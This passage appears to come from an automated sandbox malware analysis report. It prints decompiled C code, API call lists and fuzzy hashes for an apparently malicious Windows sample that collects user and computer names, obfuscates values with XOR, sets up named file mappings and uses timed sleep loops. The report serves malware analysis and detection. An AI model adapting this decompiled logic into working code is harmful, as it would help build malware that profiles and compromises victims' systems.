                        					__imp__(_t99 + 0x40);
                        					_t101 =  *0x50a37c; // 0x2fe9630
                        					_t102 = E00505AE3(1, _t157, _t144,  *_t101); // executed
                        					_t164 = _t102;
                        					_v20 = _t164;
                        					asm("lock xadd [eax], ecx");
                        					if(_t164 == 0) {
                        						L26:
                        						HeapFree( *0x50a290, _t168, _a8);
                        						goto L27;
                        					}
                        					StrTrimA(_t164, 0x5092cc);
                        					_push(_t164);
                        					_t107 = E00502829();
                        					_v8 = _t107;
                        					if(_t107 == 0) {
                        						L25:
                        						HeapFree( *0x50a290, _t168, _t164);
                        						goto L26;
                        					}
                        					 *_t164 = 0;
                        					__imp__(_a8, _v12);
                        					_t169 = __imp__;
                        					 *_t169(_a8, _v8);
                        					 *_t169(_a8, _t164);
                        					_t112 = E005033FA(0, _a8);
                        					_a4 = _t112;
                        					if(_t112 == 0) {
                        						_a20 = 8;
                        						L23:
                        						E00502813();
                        						L24:
                        						HeapFree( *0x50a290, 0, _v8);
                        						_t168 = 0;
                        						goto L25;
                        					}
                        					_t116 = E00505C63(_t144, 0xffffffffffffffff, _t164,  &_v16); // executed
                        					_a20 = _t116;
                        					if(_t116 == 0) {
                        						_t172 = _v16;
                        						_t123 = E00501671(_t172, _a4, _a12, _a16); // executed
                        						_a20 = _t123;
                        						_t124 =  *((intOrPtr*)(_t172 + 8));
                        						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
                        						_t126 =  *((intOrPtr*)(_t172 + 8));
                        						 *((intOrPtr*)( *_t126 + 8))(_t126);
                        						_t128 =  *((intOrPtr*)(_t172 + 4));
                        						 *((intOrPtr*)( *_t128 + 8))(_t128);
                        						_t130 =  *_t172;
                        						 *((intOrPtr*)( *_t130 + 8))(_t130);
                        						E00502A03(_t172);
                        					}
                        					if(_a20 != 0x10d2) {
                        						L18:
                        						if(_a20 == 0) {
                        							_t118 = _a12;
                        							if(_t118 != 0) {
                        								_t165 =  *_t118;
                        								_t170 =  *_a16;
                        								wcstombs( *_t118,  *_t118,  *_a16);
                        								_t121 = E00506459(_t165, _t165, _t170 >> 1);
                        								_t164 = _v20;
                        								 *_a16 = _t121;
                        							}
                        						}
                        						goto L21;
                        					} else {
                        						if(_a12 != 0) {
                        							L21:
                        							E00502A03(_a4);
                        							if(_a20 == 0 || _a20 == 0x10d2) {
                        								goto L24;
                        							} else {
                        								goto L23;
                        							}
                        						}
                        						_a20 = _a20 & 0x00000000;
                        						goto L18;
                        					}
                        				}
                        			}


                        APIs
                        • GetTickCount.KERNEL32 ref: 00506DCE
                        • wsprintfA.USER32 ref: 00506E1B
                        • wsprintfA.USER32 ref: 00506E38
                        • wsprintfA.USER32 ref: 00506E58
                        • wsprintfA.USER32 ref: 00506E76
                        • wsprintfA.USER32 ref: 00506E99
                        • wsprintfA.USER32 ref: 00506EBA
                        • wsprintfA.USER32 ref: 00506EDA
                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00506F0B
                        • GetTickCount.KERNEL32 ref: 00506F1C
                        • RtlEnterCriticalSection.NTDLL(02FE95F0), ref: 00506F30
                        • RtlLeaveCriticalSection.NTDLL(02FE95F0), ref: 00506F4E
                          • Part of subcall function 00505AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B0E
                          • Part of subcall function 00505AE3: lstrlen.KERNEL32(00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B16
                          • Part of subcall function 00505AE3: strcpy.NTDLL ref: 00505B2D
                          • Part of subcall function 00505AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00505B38
                          • Part of subcall function 00505AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00505B55
                        • StrTrimA.SHLWAPI(00000000,005092CC,?,02FE9630), ref: 00506F83
                          • Part of subcall function 00502829: lstrlen.KERNEL32(02FE887A,00000000,00000000,00000000,00506328,00000000), ref: 00502839
                          • Part of subcall function 00502829: lstrlen.KERNEL32(?), ref: 00502841
                          • Part of subcall function 00502829: lstrcpy.KERNEL32(00000000,02FE887A), ref: 00502855
                          • Part of subcall function 00502829: lstrcat.KERNEL32(00000000,?), ref: 00502860
                        • lstrcpy.KERNEL32(00000000,?), ref: 00506FA3
                        • lstrcat.KERNEL32(00000000,?), ref: 00506FB5
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00506FBB
                          • Part of subcall function 005033FA: lstrlen.KERNEL32(?,0050A380,73BB7FC0,00000000,00502788,?,?,?,?,?,00503EAC,?), ref: 00503403
                          • Part of subcall function 005033FA: mbstowcs.NTDLL ref: 0050342A
                          • Part of subcall function 005033FA: memset.NTDLL ref: 0050343C
                        • wcstombs.NTDLL ref: 0050704E
                          • Part of subcall function 00501671: SysAllocString.OLEAUT32(00000000), ref: 005016B2
                          • Part of subcall function 00501671: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00501734
                          • Part of subcall function 00501671: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00501773
                          • Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F
                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 0050708F
                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0050709F
                        • HeapFree.KERNEL32(00000000,00000000,?,02FE9630), ref: 005070AF
                        • HeapFree.KERNEL32(00000000,?), ref: 005070BF
                        • RtlFreeHeap.NTDLL(00000000,?), ref: 005070CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                        • String ID:
                        • API String ID: 2871901346-0
                        • Opcode ID: cf828ede7d7389b8babcd102889184bbe3449802f0b0975716541389032a6605
                        • Instruction ID: b32a30e07c44780aa2258c34bedfdb702232d0f9b3a2a76d8ba0b93c599ba78c
                        • Opcode Fuzzy Hash: cf828ede7d7389b8babcd102889184bbe3449802f0b0975716541389032a6605
                        • Instruction Fuzzy Hash: C7A1597590020AAFDB11DF68DC9CEAE3BA8FF58350F144525F809C72A1D731A958EFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E00501B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				struct %anon52 _v8;
                        				long _v12;
                        				char _v16;
                        				char _v20;
                        				signed int _v24;
                        				intOrPtr _v32;
                        				union _LARGE_INTEGER _v36;
                        				intOrPtr _v40;
                        				void* _v44;
                        				void _v88;
                        				char _v92;
                        				struct %anon52 _t46;
                        				intOrPtr _t51;
                        				long _t53;
                        				void* _t54;
                        				struct %anon52 _t61;
                        				long _t65;
                        				signed int _t66;
                        				void* _t69;
                        				void* _t71;
                        				signed int _t72;
                        				intOrPtr _t74;
                        				intOrPtr _t76;
                        				void** _t78;
                        				void* _t80;
                        
                        				_t74 = __edx;
                        				_v92 = 0;
                        				memset( &_v88, 0, 0x2c);
                        				_t46 = CreateWaitableTimerA(0, 1, 0);
                        				_v44 = _t46;
                        				if(_t46 == 0) {
                        					_v8.LowPart = GetLastError();
                        				} else {
                        					_push(0xffffffff);
                        					_push(0xff676980);
                        					_push(0);
                        					_push( *0x50a298);
                        					_v20 = 0;
                        					_v16 = 0;
                        					L00507F56();
                        					_v36.LowPart = _t46;
                        					_v32 = _t74;
                        					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                        					_t51 =  *0x50a2c4; // 0x2a4
                        					_v40 = _t51;
                        					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                        					_v8.LowPart = _t53;
                        					if(_t53 == 0) {
                        						if(_a8 != 0) {
                        							L4:
                        							 *0x50a2a4 = 5;
                        						} else {
                        							_t69 = E00504A3C(_t74); // executed
                        							if(_t69 != 0) {
                        								goto L4;
                        							}
                        						}
                        						_v12 = 0;
                        						L6:
                        						L6:
                        						if(_v12 == 1 && ( *0x50a2b8 & 0x00000001) == 0) {
                        							_v12 = 2;
                        						}
                        						_t72 = _v12;
                        						_t58 = _t72 << 4;
                        						_t76 = _t80 + (_t72 << 4) - 0x54;
                        						_t73 = _t72 + 1;
                        						_v24 = _t72 + 1;
                        						_t61 = E0050243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
                        						_v8.LowPart = _t61;
                        						if(_t61 != 0) {
                        							goto L17;
                        						}
                        						_t66 = _v24;
                        						_t90 = _t66 - 3;
                        						_v12 = _t66;
                        						if(_t66 != 3) {
                        							goto L6;
                        						} else {
                        							_v8.LowPart = E00507289(_t73, _t90,  &_v92, _a4, _a8);
                        						}
                        						goto L12;
                        						L17:
                        						__eflags = _t61 - 0x10d2;
                        						if(_t61 != 0x10d2) {
                        							_push(0xffffffff);
                        							_push(0xff676980);
                        							_push(0);
                        							_push( *0x50a29c);
                        							goto L21;
                        						} else {
                        							__eflags =  *0x50a2a0; // 0xa
                        							if(__eflags == 0) {
                        								goto L12;
                        							} else {
                        								_t61 = E00502813();
                        								_push(0xffffffff);
                        								_push(0xdc3cba00);
                        								_push(0);
                        								_push( *0x50a2a0);
                        								L21:
                        								L00507F56();
                        								_v36.LowPart = _t61;
                        								_v32 = _t76;
                        								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                        								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                        								__eflags = _t65;
                        								_v8.LowPart = _t65;
                        								if(_t65 == 0) {
                        									goto L6;
                        								} else {
                        									goto L12;
                        								}
                        							}
                        						}
                        						L25:
                        					}
                        					L12:
                        					_t78 =  &_v92;
                        					_t71 = 3;
                        					do {
                        						_t54 =  *_t78;
                        						if(_t54 != 0) {
                        							HeapFree( *0x50a290, 0, _t54);
                        						}
                        						_t78 =  &(_t78[4]);
                        						_t71 = _t71 - 1;
                        					} while (_t71 != 0);
                        					CloseHandle(_v44);
                        				}
                        				return _v8;
                        				goto L25;
                        			}

                        APIs
                        • memset.NTDLL ref: 00501B5C
                        • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00501B68
                        • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00501B8D
                        • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00501BA9
                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00501BC2
                        • HeapFree.KERNEL32(00000000,00000000), ref: 00501C57
                        • CloseHandle.KERNEL32(?), ref: 00501C66
                        • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00501CA0
                        • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00502F7D), ref: 00501CB6
                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00501CC1
                          • Part of subcall function 00504A3C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02FE9338,00000000,?,73BCF710,00000000,73BCF730), ref: 00504A8B
                          • Part of subcall function 00504A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02FE9370,?,00000000,30314549,00000014,004F0053,02FE932C), ref: 00504B28
                          • Part of subcall function 00504A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00501BD5), ref: 00504B3A
                        • GetLastError.KERNEL32 ref: 00501CD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                        • String ID:
                        • API String ID: 3521023985-0
                        • Opcode ID: 116f13f922ada32f6522df0bfcd6631dac5112852ba64a3c5c9d868d1d4b4f88
                        • Instruction ID: 784f339e217d876974dbc85582df76bf93875f52c4790a018f318fb9d8add7b6
                        • Opcode Fuzzy Hash: 116f13f922ada32f6522df0bfcd6631dac5112852ba64a3c5c9d868d1d4b4f88
                        • Instruction Fuzzy Hash: 9651767580522AABDF109F94DC889EEBFB8FF58360F204126F810A2190D7719A44DBA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E6C5017A7(intOrPtr _a4) {
                        				char _v28;
                        				struct _SYSTEMTIME _v44;
                        				char _v48;
                        				long _v52;
                        				long _v56;
                        				void* __edi;
                        				long _t21;
                        				int _t23;
                        				long _t26;
                        				long _t27;
                        				long _t31;
                        				void* _t37;
                        				intOrPtr _t39;
                        				intOrPtr _t44;
                        				signed int _t45;
                        				void* _t50;
                        				signed int _t54;
                        				void* _t56;
                        				intOrPtr* _t57;
                        
                        				_t21 = E6C50146C();
                        				_v52 = _t21;
                        				if(_t21 != 0) {
                        					L18:
                        					return _t21;
                        				} else {
                        					goto L1;
                        				}
                        				do {
                        					L1:
                        					GetSystemTime( &_v44);
                        					_t23 = SwitchToThread();
                        					asm("cdq");
                        					_t45 = 9;
                        					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                        					_t26 = E6C5015A3(0, _t54); // executed
                        					_v56 = _t26;
                        					Sleep(_t54 << 5); // executed
                        					_t21 = _v56;
                        				} while (_t21 == 0xc);
                        				if(_t21 != 0) {
                        					goto L18;
                        				}
                        				_t27 = E6C501C12(_t45); // executed
                        				_v52 = _t27;
                        				if(_t27 != 0) {
                        					L16:
                        					_t21 = _v52;
                        					if(_t21 == 0xffffffff) {
                        						_t21 = GetLastError();
                        					}
                        					goto L18;
                        				}
                        				if(_a4 != 0) {
                        					L11:
                        					_push(0);
                        					_t56 = E6C501CA4(E6C5016EC,  &_v28);
                        					if(_t56 == 0) {
                        						_v56 = GetLastError();
                        					} else {
                        						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                        						_v56 = _t31;
                        						if(_t31 == 0) {
                        							GetExitCodeThread(_t56,  &_v56);
                        						}
                        						CloseHandle(_t56);
                        					}
                        					goto L16;
                        				}
                        				if(E6C501D7C(_t45,  &_v48) != 0) {
                        					 *0x6c5041b8 = 0;
                        					goto L11;
                        				}
                        				_t44 = _v48;
                        				_t57 = __imp__GetLongPathNameW;
                        				_t37 =  *_t57(_t44, 0, 0); // executed
                        				_t50 = _t37;
                        				if(_t50 == 0) {
                        					L9:
                        					 *0x6c5041b8 = _t44;
                        					goto L11;
                        				}
                        				_t15 = _t50 + 2; // 0x2
                        				_t39 = E6C501C8F(_t50 + _t15);
                        				 *0x6c5041b8 = _t39;
                        				if(_t39 == 0) {
                        					goto L9;
                        				} else {
                        					 *_t57(_t44, _t39, _t50); // executed
                        					E6C50136A(_t44);
                        					goto L11;
                        				}
                        			}

                        APIs
                          • Part of subcall function 6C50146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6C5017B8,73B763F0,00000000), ref: 6C50147B
                          • Part of subcall function 6C50146C: GetVersion.KERNEL32 ref: 6C50148A
                          • Part of subcall function 6C50146C: GetCurrentProcessId.KERNEL32 ref: 6C501499
                          • Part of subcall function 6C50146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6C5014B2
                        • GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6C5017CB
                        • SwitchToThread.KERNEL32 ref: 6C5017D1
                          • Part of subcall function 6C5015A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6C5015F9
                          • Part of subcall function 6C5015A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6C5017EC), ref: 6C50168B
                          • Part of subcall function 6C5015A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6C5016A6
                        • Sleep.KERNELBASE(00000000,00000000), ref: 6C5017F4
                        • GetLongPathNameW.KERNELBASE ref: 6C50183C
                        • GetLongPathNameW.KERNELBASE ref: 6C50185A
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,6C5016EC,?,00000000), ref: 6C50188C
                        • GetExitCodeThread.KERNEL32(00000000,?), ref: 6C5018A0
                        • CloseHandle.KERNEL32(00000000), ref: 6C5018A7
                        • GetLastError.KERNEL32(6C5016EC,?,00000000), ref: 6C5018AF
                        • GetLastError.KERNEL32 ref: 6C5018C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                        • String ID:
                        • API String ID: 2280543912-0
                        • Opcode ID: 5752f6e75f1a59005595f9d4c8a1ef0a1fe6be7c47b7d48667f56a48e0ad39d6
                        • Instruction ID: d82bc1c4081339a93eb9576406dec1ba024d90decb5ee9a37e1ae434b7bc0ad1
                        • Opcode Fuzzy Hash: 5752f6e75f1a59005595f9d4c8a1ef0a1fe6be7c47b7d48667f56a48e0ad39d6
                        • Instruction Fuzzy Hash: 6A313A72B057119BD710DF658C8899B77FCBF8675CB150A2AF964D3640E730CA048BA7
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 64%
                        			E00502D63(signed int __edx) {
                        				signed int _v8;
                        				long _v12;
                        				signed int _v16;
                        				long _v20;
                        				void* _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				char _v40;
                        				void* __edi;
                        				void* __esi;
                        				void* _t27;
                        				long _t28;
                        				long _t31;
                        				intOrPtr _t32;
                        				void* _t36;
                        				signed int _t37;
                        				intOrPtr _t38;
                        				void* _t39;
                        				CHAR* _t42;
                        				long _t48;
                        				long _t49;
                        				void* _t54;
                        				void* _t56;
                        				intOrPtr _t64;
                        				void* _t67;
                        				long _t71;
                        				void* _t72;
                        				signed char _t74;
                        				intOrPtr _t76;
                        				signed int _t77;
                        				long _t82;
                        				long _t84;
                        				CHAR* _t87;
                        				void* _t88;
                        
                        				_t79 = __edx;
                        				_v16 = 0;
                        				_v8 = 0;
                        				_v12 = 0;
                        				_t27 = E00505901();
                        				if(_t27 != 0) {
                        					_t77 =  *0x50a2b4; // 0x2000000a
                        					_t73 = (_t77 & 0xf0000000) + _t27;
                        					 *0x50a2b4 = (_t77 & 0xf0000000) + _t27;
                        				}
                        				_t28 =  *0x50a14c(0, 2); // executed
                        				_v20 = _t28;
                        				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                        					_t31 = E00504097( &_v8,  &_v16); // executed
                        					_push(0);
                        					_t84 = _t31;
                        					_t32 =  *0x50a2d0; // 0x2add5a8
                        					_push(0x50a2d8);
                        					_push(1);
                        					_t7 = _t32 + 0x50b5bc; // 0x4d283a53
                        					 *0x50a2d4 = 0xc;
                        					 *0x50a2dc = 0;
                        					L00505EC2();
                        					_t36 = E005057AD(_t79,  &_v24,  &_v12); // executed
                        					if(_t36 == 0) {
                        						CloseHandle(_v24);
                        					}
                        					if(_t84 != 5) {
                        						_t37 = _v16;
                        						__eflags = _t37;
                        						if(_t37 != 0) {
                        							E00503946(_t37 ^ 0xe8fa7dd7,  &_v40);
                        							_t87 = E00505C4E(0x27);
                        							__eflags = _t87;
                        							if(_t87 != 0) {
                        								asm("bswap eax");
                        								asm("bswap eax");
                        								asm("bswap eax");
                        								asm("bswap eax");
                        								_t64 =  *0x50a2d0; // 0x2add5a8
                        								_t18 = _t64 + 0x50b916; // 0x78383025
                        								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                        								_t88 = _t88 + 0x18;
                        							}
                        							 *0x50a328 = _t87;
                        						}
                        						_t38 = E00502304();
                        						 *0x50a2c8 =  *0x50a2c8 ^ 0xe8fa7dd7;
                        						 *0x50a318 = _t38;
                        						_t39 = E00505C4E(0x60);
                        						__eflags = _t39;
                        						 *0x50a37c = _t39;
                        						if(_t39 == 0) {
                        							_t84 = 8;
                        						} else {
                        							memset(_t39, 0, 0x60);
                        							_t54 =  *0x50a37c; // 0x2fe9630
                        							_t88 = _t88 + 0xc;
                        							__imp__(_t54 + 0x40);
                        							_t56 =  *0x50a37c; // 0x2fe9630
                        							 *_t56 = 0x50b882;
                        							_t84 = 0;
                        						}
                        						__eflags = _t84;
                        						if(_t84 == 0) {
                        							_t42 = RtlAllocateHeap( *0x50a290, _t84, 0x52);
                        							__eflags = _t42;
                        							 *0x50a310 = _t42;
                        							if(_t42 == 0) {
                        								_t84 = 8;
                        							} else {
                        								_t74 =  *0x50a2b4; // 0x2000000a
                        								_t79 = _t74 & 0x000000ff;
                        								_t76 =  *0x50a2d0; // 0x2add5a8
                        								_t19 = _t76 + 0x50b212; // 0x697a6f4d
                        								_t73 = _t19;
                        								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x5092c7);
                        							}
                        							__eflags = _t84;
                        							if(_t84 == 0) {
                        								asm("sbb eax, eax");
                        								E00503946( ~_v8 &  *0x50a2c8, 0x50a00c); // executed
                        								_t84 = E0050374B(_t73);
                        								__eflags = _t84;
                        								if(_t84 != 0) {
                        									goto L31;
                        								}
                        								_t48 = E00503E8F(_t73); // executed
                        								__eflags = _t48;
                        								if(_t48 != 0) {
                        									__eflags = _v8;
                        									_t82 = _v12;
                        									if(_v8 != 0) {
                        										L30:
                        										_t49 = E00501B47(_t79, _t82, _v8); // executed
                        										_t84 = _t49;
                        										goto L31;
                        									}
                        									__eflags = _t82;
                        									if(__eflags == 0) {
                        										goto L31;
                        									}
                        									_t23 = _t82 + 4; // 0x5
                        									_t84 = E00505D26(__eflags, _t23);
                        									__eflags = _t84;
                        									if(_t84 == 0) {
                        										goto L31;
                        									}
                        									goto L30;
                        								}
                        								_t84 = 8;
                        							}
                        						}
                        					} else {
                        						_t71 = _v12;
                        						if(_t71 == 0) {
                        							L31:
                        							if(_v20 == 0 || _v20 == 1) {
                        								 *0x50a150();
                        							}
                        							goto L35;
                        						}
                        						_t72 = _t71 + 4;
                        						do {
                        							_push(1);
                        							_push(_t72);
                        							_t67 = 5;
                        						} while (E005063CD(_t67, 0) == 0x4c7);
                        					}
                        					goto L31;
                        				} else {
                        					_t84 = _t28;
                        					L35:
                        					return _t84;
                        				}
                        			}

                        APIs
                          • Part of subcall function 00505901: GetModuleHandleA.KERNEL32(4C44544E,00000000,00502D7C,00000000,00000000,00000000,?,?,?,?,?,005044F9,?,00000001), ref: 00505910
                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0050A2D8,00000000), ref: 00502DE7
                        • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,005044F9,?,00000001), ref: 00502E00
                        • wsprintfA.USER32 ref: 00502E80
                        • memset.NTDLL ref: 00502EB0
                        • RtlInitializeCriticalSection.NTDLL(02FE95F0), ref: 00502EC1
                        • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00502EEA
                        • wsprintfA.USER32 ref: 00502F1A
                          • Part of subcall function 00503946: GetUserNameW.ADVAPI32(00000000,?/P), ref: 0050397D
                          • Part of subcall function 00503946: RtlAllocateHeap.NTDLL(00000000,?/P), ref: 00503994
                          • Part of subcall function 00503946: GetUserNameW.ADVAPI32(00000000,?/P), ref: 005039A1
                          • Part of subcall function 00503946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00502F3F,?,?,?,?,?,005044F9,?,00000001), ref: 005039C2
                          • Part of subcall function 00503946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 005039E9
                          • Part of subcall function 00503946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 005039FD
                          • Part of subcall function 00503946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00503A0A
                          • Part of subcall function 00503946: HeapFree.KERNEL32(00000000,00000000), ref: 00503A28
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                        • String ID: ~P
                        • API String ID: 2910951584-1055297808
                        • Opcode ID: 4849e87bd40a2c1df11bdb725cd0697c18dd6de0e60867cc8201253a60aed3ca
                        • Instruction ID: b8c8e69fdc4d62e4023efb6653aa8520511f152d3bfaec89efe5ae327a4b225a
                        • Opcode Fuzzy Hash: 4849e87bd40a2c1df11bdb725cd0697c18dd6de0e60867cc8201253a60aed3ca
                        • Instruction Fuzzy Hash: A6512071940306ABDB21DBA4CC8EFAEBBB8BB64740F100525F904E72D1E7709D44DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E005057AD(intOrPtr __edx, void** _a4, void** _a8) {
                        				intOrPtr _v8;
                        				struct _FILETIME* _v12;
                        				short _v56;
                        				struct _FILETIME* _t12;
                        				intOrPtr _t13;
                        				void* _t17;
                        				void* _t21;
                        				intOrPtr _t27;
                        				long _t28;
                        				void* _t30;
                        
                        				_t27 = __edx;
                        				_t12 =  &_v12;
                        				GetSystemTimeAsFileTime(_t12);
                        				_push(0x192);
                        				_push(0x54d38000);
                        				_push(_v8);
                        				_push(_v12);
                        				L00507F50();
                        				_push(_t12);
                        				_v12 = _t12;
                        				_t13 =  *0x50a2d0; // 0x2add5a8
                        				_t5 = _t13 + 0x50b84d; // 0x2fe8df5
                        				_t6 = _t13 + 0x50b580; // 0x530025
                        				_push(0x16);
                        				_push( &_v56);
                        				_v8 = _t27;
                        				L00507C2A();
                        				_t17 = CreateFileMappingW(0xffffffff, 0x50a2d4, 4, 0, 0x1000,  &_v56); // executed
                        				_t30 = _t17;
                        				if(_t30 == 0) {
                        					_t28 = GetLastError();
                        				} else {
                        					if(GetLastError() == 0xb7) {
                        						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                        						if(_t21 == 0) {
                        							_t28 = GetLastError();
                        							if(_t28 != 0) {
                        								goto L6;
                        							}
                        						} else {
                        							 *_a4 = _t30;
                        							 *_a8 = _t21;
                        							_t28 = 0;
                        						}
                        					} else {
                        						_t28 = 2;
                        						L6:
                        						CloseHandle(_t30);
                        					}
                        				}
                        				return _t28;
                        			}

                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00502DF9,?,00000001,?), ref: 005057B9
                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 005057CF
                        • _snwprintf.NTDLL ref: 005057F4
                        • CreateFileMappingW.KERNELBASE(000000FF,0050A2D4,00000004,00000000,00001000,?), ref: 00505810
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00502DF9,?), ref: 00505822
                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00505839
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00502DF9), ref: 0050585A
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00502DF9,?), ref: 00505862
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                        • String ID:
                        • API String ID: 1814172918-0
                        • Opcode ID: 338d595cf69ad1703fbf46e6a9f73d9d5dedbfe4f32f630ba16f6dc3873452c6
                        • Instruction ID: 3a1c20a8c4f642403d5da19e714279403c26718bb4a69b1e37ad3e2fcafdef0e
                        • Opcode Fuzzy Hash: 338d595cf69ad1703fbf46e6a9f73d9d5dedbfe4f32f630ba16f6dc3873452c6
